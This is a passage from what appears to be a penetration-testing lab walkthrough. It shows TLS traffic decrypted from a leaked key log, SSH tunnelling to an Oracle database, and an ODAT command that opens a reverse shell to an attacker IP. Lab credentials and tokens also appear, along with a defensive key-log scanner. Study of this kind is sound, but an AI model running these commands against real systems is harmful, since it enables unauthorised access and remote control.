As the diagram above shows, the DB system appears in the network, but JavaDev does not. JavaDev is not a separate system; its token is hidden in other files, which can be found on a specific system.

Attacking the JavaDev:

As we remember, we found a debug folder on the SSH system. That folder contains a log file and a pcap file captured by Wireshark.

We opened the debug.txt file and found that it was a log of HTTPS-encrypted traffic.

Scrolling down in the same text file, we found the Client Nonce and the Master Secret key.

After Googling both keys, we found that SSL traffic can be decrypted using Wireshark. Before that, we saved both keys in a separate text file, key.txt, in this format:

CLIENT_RANDOM 56448610b995cc0f8100560fcf0cf8be7330b2d2f31d86a4259e1ec102f76c50 7cda1b7081ae8a7fae76ca71fbc704ec24796ce5c1f53a15f16325b33946544fd0b1dabde4db187504a74c1138d163bf

Open Wireshark, then go to File > Preferences.

Then select SSL from the protocol section.

Browse for the text file where we saved the client nonce and master secret key, and press OK.

Now load the pcap file in Wireshark.

Now go to Analyze > Decode As

Select SSL from the list.

Now click on the Client Hello string and go to Analyze > Follow SSL Stream.

And we found the token for JavaDev and also the credentials for the database:

instance: XE
user: TESTER1
password: Token_Java_dev_hydrogen1
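The key.txt layout used above is the NSS key log format, and any log or artifact that retains such a line lets whoever holds a matching capture decrypt that session. The scanner below is an added example, not part of the original write-up, that flags these entries in text such as debug logs without echoing the secret; the function name and sample input are assumptions, and it goes beyond the TLS 1.2 `CLIENT_RANDOM` case on the page by also recognising the TLS 1.3 labels.

```python
import re

# Labels from the NSS key log format, with the secret sizes (bytes) each allows:
# 48 for a TLS 1.2 master secret, 32 or 48 for TLS 1.3 (SHA-256 / SHA-384).
LABELS = {
    "CLIENT_RANDOM": (48,),
    "CLIENT_EARLY_TRAFFIC_SECRET": (32, 48),
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET": (32, 48),
    "SERVER_HANDSHAKE_TRAFFIC_SECRET": (32, 48),
    "CLIENT_TRAFFIC_SECRET_0": (32, 48),
    "SERVER_TRAFFIC_SECRET_0": (32, 48),
    "EXPORTER_SECRET": (32, 48),
}
# <LABEL> <32-byte client random, hex> <secret, hex>
ENTRY = re.compile(r"\b([A-Z][A-Z0-9_]+)\s+([0-9a-fA-F]{64})\s+([0-9a-fA-F]+)\b")


def find_keylog_secrets(text):
    """Report well-formed key log entries without echoing the secret itself."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in ENTRY.finditer(line):
            label, client_random, secret = m.groups()
            sizes = LABELS.get(label)
            if sizes is None or len(secret) % 2 or len(secret) // 2 not in sizes:
                continue  # unknown label or wrong secret length: not usable
            findings.append({
                "line": lineno,
                "label": label,
                "session": client_random[:8].lower(),  # enough to identify it
                "secret_bytes": len(secret) // 2,
            })
    return findings


# Constructed debug-log excerpt (values are made up, not taken from the page).
SAMPLE = "\n".join([
    "12:00:00 DEBUG starting TLS handshake",
    "CLIENT_RANDOM " + "ab" * 32 + " " + "cd" * 48,
    "DEBUG CLIENT_RANDOM " + "ab" * 32 + " " + "cd" * 20,  # secret too short
    "SERVER_TRAFFIC_SECRET_0 " + "12" * 32 + " " + "ef" * 32,
])

if __name__ == "__main__":
    for finding in find_keylog_secrets(SAMPLE):
        print(finding)
```

Run over log directories or build artifacts, any finding means the affected sessions should be treated as readable by anyone with the capture, and credentials sent in them rotated.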

Attacking the DB:

Before attacking this system, we need two things on our system:

Oracle support in Metasploit: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux (install the 11.1 version only)
ODAT (Oracle Database Attack Toolkit): https://github.com/quentinhardy/odat

Once both tools are configured on the system, we need to create an SSH tunnel to connect to the DB. Notice in the network diagram that there is an SSH icon and that it is in a different network. Command usage (<key_file> is a placeholder for the SSH private key file passed to -i):

ssh -nNT -i <key_file> -f -L 9000:192.168.0.5:1521 davis@192.168.101.7

Now, to connect to the database, we have the instance, username, and password that we found from JavaDev. Type in the following command:

sqlplus 'TESTER1/Token_Java_dev_hydrogen1@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=127.0.0.1)(Port=9000))(CONNECT_DATA=(SID=XE)))'

Now we will use the ODAT tool. Type in:

./odat.py dbmsscheduler -s 127.0.0.1 -p 9000 -d XE -U TESTER1 -P Token_Java_dev_hydrogen1 --reverse-shell 10.10.81.190 443

After running the command, we get shell access. Then simply find the token by using find -name "token"; the output will be /u01/app/oracle/product/11.2.0/xe/token.txt

Reference: https://www.trustwave.com/Resources/SpiderLabs-Blog/How-To-Decrypt-Ruby-SSL-Communications-with-Wireshark/